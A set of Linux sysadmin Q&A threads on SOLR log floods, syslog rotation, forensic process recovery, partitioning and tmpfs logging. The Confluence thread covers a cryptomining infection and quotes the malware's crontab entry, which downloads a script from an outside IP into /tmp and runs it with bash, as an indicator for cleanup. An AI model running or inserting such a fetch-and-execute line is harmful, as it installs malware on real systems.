I am using Liferay Portal 6.0.6, on which I have developed an intranet platform for my organization.
User authentication and import are done via LDAP (AD integration).
There is a case where one user, who is active and visible in the Users section of the Control Panel, is not displayed in the search results of the search portlet. All users can be searched except this one.
Does anyone have any idea why this could be happening? If so, please help.
P.S. - The search portlet has not been modified using Hooks or Exts. It is the default out-of-the-box portlet that Liferay provides.
You can use the Luke index browser (https://code.google.com/p/luke/) to view the Lucene index created by Liferay and discover how that particular user is stored.
Maybe this strange user is indexed in a way you don't expect, which would help you understand the context.
After a lot of research and a close look, I found a solution.
My Liferay instance is connected to a SOLR server which handles all the indices. I checked my SOLR server and found that its disk was completely full.
I ran the following command and got the following result:
[root@ze42-v-zlapp02 bin]# df -h
Filesystem                      Size  Used Avail Use% Mounted on
/dev/mapper/VolGroup00-lv_root  227G  227G    0G 100% /
/dev/sda1                        99M   18M   77M  19% /boot
tmpfs                           3.9G     0  3.9G   0% /dev/shm
I found out that the logs SOLR was generating had flooded the server's disk. So I implemented the following steps to mitigate the issue:
Stop the Liferay Tomcat server
Stop the SOLR server
Delete the log files in the SOLR-tomcat/logs folder
Clear catalina.out using cat /dev/null > catalina.out (note: do not delete catalina.out itself)
Start the SOLR server
Go to the SOLR console at http://yoursolrIP:port/solr/admin/logging and set all secondary log levels to INFO
Start your Liferay server
I also implemented an old-log deletion script and added it to a cron job. Now only the last 10 days of logs are kept in my case, and anything older is deleted automatically by the cron job (a sketch is shown below).
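For reference, a minimal version of such a cleanup job might look like this (the log directory path is just an assumption; adjust it to wherever your SOLR Tomcat writes its logs):
# crontab entry: every night at 02:00, delete SOLR log files older than 10 days
0 2 * * * find /opt/solr-tomcat/logs -type f -mtime +10 -delete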
Your own answer is only a temporary solution. Best practice would be to implement logrotate. This is done at the OS level, so any of your sysadmins should be able to do it for you. If you have to do it yourself, here is a link which describes how to enable logrotate on a RHEL5 system: http://www.sysarchitects.com/logrotate_for_solr
As the implementation of logrotate can vary between OSes, I can't provide any further information ;)
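For illustration, a minimal logrotate snippet for the SOLR logs could look roughly like this (the path is an assumption; it would go in a file under /etc/logrotate.d/):
/opt/solr-tomcat/logs/*.log {
    daily
    rotate 10
    compress
    missingok
    notifempty
    copytruncate
}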
Related
I'm running a Jira and a Confluence instance (plus an nginx reverse proxy) on a VPS. Currently, I can't start Confluence for some reason, and I think this is a consequence of something else.
I've checked the process list:
The confluence user is running a /boot/vmlinuz process and it eats the CPU. If I kill -9 this process, it starts again a few seconds later.
After rebooting the VPS:
Confluence and Jira started automatically.
Confluence runs correctly for a few seconds, then something kills the process. The Jira process keeps running.
The /boot/vmlinuz process starts.
I've removed Confluence from the automatic start, but it makes no difference.
So my questions:
What is this /boot/vmlinuz process? I have never seen it before. (Yes, I know vmlinuz is the kernel.)
Why does it start over and over again and run at 100% CPU?
What should I do to get back to normal behavior so that I can start Confluence?
Thanks for any answers.
UPDATE
It was caused by a hack. If you find a /tmp/seasame file, your server is infected. It uses cron to download this file. I've removed the files in the /tmp folder, killed all the processes, disabled cron for the confluence user, and updated Confluence.
Your server looks like it has been hacked.
Please take a close look at the process list,
e.g. run ps auxc and look at where the process binaries come from.
You can use tools like rkhunter to scan your server, but in general you should start by killing everything that has been launched as the confluence user, scanning your server/account, upgrading your Confluence (in most cases the compromised user points you to the source of the attack), and looking in your Confluence for additional accounts, etc.
If you would like to see what is in that process, take a look at /proc, e.g. ls -la /proc/996. You will see the source binary there too. You can also launch strace -ff -p 996 to see what the process is doing, or cat /proc/996/exe | strings to see what strings that binary contains. This is probably part of some kind of botnet, a miner, etc.
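Putting those commands together (996 is just the PID from the example above; substitute the PID of the suspicious process):
ps auxc                       # list processes by their real binary names
ls -la /proc/996              # the exe symlink shows where the binary actually lives
strace -ff -p 996             # watch the system calls the process is making
cat /proc/996/exe | strings   # dump printable strings from the running binary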
I had the same problem; the server was hacked and the virus script was in /tmp. Find the script name with the top command (a meaningless string of letters; mine was named "fcbk6hj") and kill the processes (maybe 3 of them):
root 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKgl
root 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHl
root 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot
Kill all of them, delete /tmp/prot, and kill the /boot/vmlinuz process; the CPU goes back to normal.
I found that the virus had downloaded the script to /tmp automatically; my workaround was to mv wgetak to another name.
Virus behaviour:
wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
I found the following task written in the crontab; just delete it:
*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 && bash /tmp/seasame
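A rough sketch of the cleanup, assuming the rogue entry lives in the confluence user's crontab and the file names match the ones mentioned above:
crontab -u confluence -l                    # inspect the user's crontab for the rogue entry
crontab -u confluence -e                    # delete that line (or crontab -u confluence -r to wipe the crontab entirely)
rm -f /tmp/seasame /tmp/prot /tmp/fcbk6hj   # remove the dropped files named in the posts above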
After removing this from the system and the crontab, it may be a good idea (at least for now) to add the confluence user to /etc/cron.deny.
And afterwards:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information
I ran into the same issue at the same time; maybe it is a Confluence bug. I just killed the Confluence process and then it was alright.
As you found out, this is malware, specifically cryptojacking malware, intended to use your CPU as a cryptocurrency miner.
Your server has very likely been compromised through a Confluence vulnerability (see the first answer of this reddit post); however, one should know that this is NOT ITS ONLY WAY OF PROPAGATION, which can't be emphasized enough. As a matter of fact, a server of mine was compromised as well although it doesn't run Confluence (I don't even know this software…), and the so-called /boot/vmlinuz process was run by root.
Also, beware that this malware tries to propagate through SSH using known_hosts and SSH keys, so you should check other computers you accessed from this server.
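To get a quick list of candidates, something like this helps (only a sketch; it shows which hosts and keys could have been reused, not proof of propagation):
# hosts previously reached over SSH (entries may be hashed if HashKnownHosts is enabled)
cat /root/.ssh/known_hosts /home/*/.ssh/known_hosts 2>/dev/null
# private keys and unexpected authorized_keys entries the malware could reuse
ls -la /root/.ssh /home/*/.ssh 2>/dev/null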
Finally, the reddit post links to this comprehensive description of this malware, which is worth a read.
NB: Don't forget to send a report to the abuse email address of the IP's ISP.
I am performing forensic analysis on host-based evidence, examining partitions of a hard drive from a server.
I am interested in finding the processes all the "users" ran before the system died/rebooted.
As this isn't live analysis I can't use ps or top to see the running processes.
So, I was wondering if there is a log like /var/log/messages that shows me what processes users ran.
I have gone through a lot of logs in /var/log/* - they give me information about logins, package updates, authorization - but nothing about the processes.
If "command accounting" (process accounting) was not enabled, there is no such log.
The chances of finding something are not great; still, a few things to consider:
It depends on how graceful the death/reboot was (if processes were killed gracefully, .bash_history and similar files may have been updated with recent session info).
The utmp and wtmp files may give you the list of users active at the time of the reboot.
The OS may save a crash dump (this depends on the Linux distribution). If so, you may be able to examine the OS state at the moment of the crash. See Red Hat's crash utility for details (http://people.redhat.com/anderson/crash_whitepaper/).
/tmp and /var/tmp may hold some clues about what was running.
Any files with mtime and ctime timestamps (maybe atime as well) near the time of the crash.
You may be able to get something useful from the swap partition (especially if the reboot was related to heavy RAM usage). A sketch of a few of these checks follows this list.
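A minimal sketch of a few of these checks against a mounted evidence image (the mount point /mnt/evidence, the swap device, and the time window are all placeholders):
last -f /mnt/evidence/var/log/wtmp           # sessions and reboots recorded in wtmp
tail /mnt/evidence/home/*/.bash_history      # last commands, if the shells exited cleanly
find /mnt/evidence -newermt '2014-01-01 00:00' ! -newermt '2014-01-01 02:00' -printf '%T@ %p\n'   # files modified in the crash window
strings /dev/mapper/evidence-swap | less     # search the swap partition for readable leftovers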
So, I was wondering if there is a log like /var/log/messages that shows me what processes users ran
Given the file system path /var/log, I am assuming you are using Ubuntu or some other Linux-based server. If you were not doing live forensics while the box was running, or memory forensics (where a memory capture was grabbed), AND you rebooted the system, there is no file within /var/log that will attribute processes to users. However, if a user was using the bash shell, you could check their .bash_history file, which shows the commands run by that user (up to the last 500 by default for the bash shell).
Alternatively, if a memory dump was made (/dev/mem or /dev/kmem), then you could use Volatility to pull out the processes that were running on the box. But still, I do not think you could attribute the processes to the users that ran them; you would need additional output from Volatility for that link to be made.
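For example, with Volatility 2 and a Linux profile built for the exact kernel of that box (the image name and profile below are hypothetical):
python vol.py -f memdump.lime --profile=LinuxDebian7x64 linux_pslist   # running processes with PID/UID
python vol.py -f memdump.lime --profile=LinuxDebian7x64 linux_psaux    # full command lines
python vol.py -f memdump.lime --profile=LinuxDebian7x64 linux_bash     # bash history recovered from memory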
I am using syslog on an embedded Linux device (Debian ARM) that has relatively small storage (~100 MB). If we assume the system will be up for 30 years and logs all possible activity, could syslog fill up the storage? If so, is syslog intelligent enough to remove old logs when space on the storage medium runs low?
It completely depends on how much gets logged, but with only ~100 MB it is certainly likely that your storage will fill up well before 30 years!
You didn't say which syslog server you're using. If you're on an embedded device you might be using the BusyBox syslogd, or you may be using the regular syslogd, or you may be using rsyslog. But in general, no syslog server rotates log files all by itself. They all depend on external scripts run from cron to do it. So you should make sure you have such scripts installed.
In non-embedded systems the log rotation functionality is often provided by a software package called logrotate, which is quite elaborate and has configuration files that say how and when which log files should be rotated. In embedded systems there is no standard at all. The most common configuration (especially when using BusyBox) is that logs are not written to disk at all, only to a memory ring buffer. The next most common configuration is idiosyncratic ad-hoc scripts built and installed by the embedded system integrator. So you just have to scan the crontabs and see whether anything is configured to be invoked that looks like a log rotator.
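For illustration, the BusyBox ring-buffer setup mentioned above looks roughly like this (the buffer size is arbitrary):
syslogd -C128   # BusyBox syslogd: log to a 128 KB in-memory circular buffer instead of a file
logread         # dump the buffer; logread -f follows it like tail -f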
In the Linux Bible book, I read that it is useful to install Linux across different partitions; for example, separating /var is beneficial because it prevents an attacker from filling the hard drive and stopping the OS (since the web pages are in /var/www/), while the application in /usr (nginx, for example) keeps running. How can we do this?
Sorry for the question, I am new to Linux. The first time I tried to access another partition (the D: drive in Windows), it asked me to mount it first (I had made a shortcut to a document on D:, and the shortcut didn't work until I mounted the partition). So does it make sense to create 5 partitions (/boot, /usr, /var, /home, /tmp) for the OS?
Do web hosts use the same strategy?
Even if you divide the disk into partitions, an attacker can fill the logs and make the web service unstable. These are mostly (or by default) located in the /var/log folder; some distros even put the web server's log folder under /etc/webserver/log.
There are also some upload-related flaws where PHP upload features fill up the /tmp folder.
So partitioning alone will not protect you at all; you must look at security from another perspective.
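For completeness, the separate-partition layout the question asks about just ends up as separate entries in /etc/fstab, roughly like the sketch below (device names and mount options are only examples; a distribution installer normally creates this for you during manual partitioning):
/dev/sda1  /boot  ext4  defaults                      0 2
/dev/sda2  /      ext4  defaults                      0 1
/dev/sda3  /usr   ext4  defaults                      0 2
/dev/sda5  /var   ext4  defaults,nodev                0 2
/dev/sda6  /home  ext4  defaults,nodev,nosuid         0 2
/dev/sda7  /tmp   ext4  defaults,nodev,nosuid,noexec  0 2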
Application scenario:
I have the (normal/permanent) /var/log mounted on an encrypted partition (/dev/LVG/log). /dev/LVG/log is not accessible at boot time, it needs to be manually activated later by su from ssh.
A RAM drive (using tmpfs) is mounted to /var/log at init time (in rc.local).
Once /dev/LVG/log is activated, I need a good way of appending everything in the tmpfs to /dev/LVG/log, before mounting it as /var/log.
Any recommendations on what would be a good way of doing so? Thanks in advance!
The only thing you can do is block until you somehow verify that /var/log is mounted on the encrypted VG, or queue log entries until that has happened if your app must start at boot, which could get kind of expensive. You can't be responsible for every other app on the system, and I can't see any reason to encrypt boot logs.
Then again, if you know the machine has heap to spare, a log queue that flushes once some event says it is OK to write to disk would seem sensible. That's no more expensive than the history most shells keep, as long as you take care to avoid floods of events that could fill up the queue.
This does not account for possible log loss, but could with a little imagination.
There is a risk you could lose logging. You might want to write your logs to a file in /tmp, which is tmpfs and thus in memory. You could then append the content to your encrypted volume and remove the file in /tmp. Of course, if your machine failed to boot and went down again, /tmp would be erased, and you'd lose a good way of working out why.
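Either way, the append-and-switch step the question describes could look roughly like this (a rough sketch, assuming /dev/LVG/log has just been unlocked and /var/log is currently the tmpfs; the staging mount point is an assumption, and any daemons holding log files open will need a restart or SIGHUP at the end):
mkdir -p /mnt/permlog
mount /dev/LVG/log /mnt/permlog
# append everything collected in the tmpfs since boot onto the permanent copies
cd /var/log
find . -type f | while read -r f; do
    mkdir -p "/mnt/permlog/$(dirname "$f")"
    cat "$f" >> "/mnt/permlog/$f"
done
cd /
umount /mnt/permlog
mount /dev/LVG/log /var/log   # the tmpfs stays mounted underneath, hidden by the new mount
# restart or send SIGHUP to syslog so it reopens its files on the encrypted volume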